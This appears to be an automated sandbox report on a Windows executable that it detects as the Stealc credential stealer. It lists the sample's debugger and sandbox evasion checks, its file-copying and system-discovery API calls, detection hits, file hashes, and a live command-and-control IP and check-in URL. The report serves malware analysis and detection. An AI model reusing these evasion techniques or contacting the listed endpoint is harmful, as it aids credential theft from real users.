                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE26B second address: 12DE270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE270 second address: 12DE27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1548D0B2F6h 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1121B9F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12CE6D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1360A79 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00ED38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ED4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ECE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00ED4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ECED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00ED3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF68A FindFirstFileA,0_2_00ECF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ECBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ECDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC1160 GetSystemInfo,ExitProcess,0_2_00EC1160
                Source: file.exe, file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxR
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareU
                Source: file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13649
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13704
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13669
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13664
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC45C0 VirtualProtect ?,00000004,00000100,000000000_2_00EC45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00ED9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9750 mov eax, dword ptr fs:[00000030h]0_2_00ED9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00ED78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00ED9600
                Source: file.exe, file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Q?Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00ED7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00ED7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00ED7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00ED7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/e2b1563c6670f193.php.file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37pfile.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/6tfile.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpZfile.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520589
                              Start date and time:2024-09-27 16:16:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:2
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 84
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                              • 185.215.113.103
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94802208537805
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'875'456 bytes
                              MD5:ad0c6bd7353136531af5325034613533
                              SHA1:ee44d2b2e6ad3e32da9c074b5b880e4947c4970c
                              SHA256:5947b0b670dbb94778390c83aeb091874f10cb952b2dc3c459ac0e23f380a523
                              SHA512:4173f1abc677aa4a17b1947d3c9c164817e7c35f3b9240842861e0babfaba02751f11fda52eee544d62e6a5b3226ac32d1561cf0e2071eede671a18ed956a85a
                              SSDEEP:24576:D6wf7cLoJNPpd/jAsGyco0dBBgnXxTrOyIhfX0nI3ZGASsQjipNuDpNv28EGFZ2K:Dl7GcTSsG72x+ysfX/psGpkp86bFX
                              TLSH:C19533926D43F2F6EDC26771B553AA8E6235DFC479261D54288B8C0C247392FF4DC82A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xab4000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F1548CA2E4Ah
                              haddps xmm3, dqword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F1548CA4E45h
                              add byte ptr [edx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax-66h], ah
                              inc ebx
                              cmp eax, dword ptr [eax+edx*4-06h]
                              sldt word ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [ecx], eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, byte ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or byte ptr [eax+00000000h], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add eax, 0000000Ah
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x2280039e9fb59c0c24bb828f43320b8178d91unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2b10000x2009acee5a36eab5b91d33884dd252fed27unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              llbyxbem0x50f0000x1a40000x1a3a0091aad5711e47847d04b720b369740ae9False0.9949982080354484data7.9547357115051796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              vndwcpmt0x6b30000x10000x600763fa978514f11211415d40d3e140f6fFalse0.5611979166666666data4.9508808550480135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6b40000x30000x2200032398fe2d5a0a7180ad8285bc630ef7False0.07410386029411764DOS executable (COM)0.77590994190649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-27T16:17:12.173171+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 16:17:10.785897017 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:10.797452927 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:10.797525883 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:10.797700882 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:10.802763939 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:11.500509977 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:11.500602961 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:11.503679037 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:11.508725882 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:12.173007011 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:12.173171043 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:12.174293041 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:12.174386978 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:12.174649954 CEST8049704185.215.113.37192.168.2.5
                              Sep 27, 2024 16:17:12.174702883 CEST4970480192.168.2.5185.215.113.37
                              Sep 27, 2024 16:17:15.301161051 CEST4970480192.168.2.5185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549704185.215.113.37806172C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
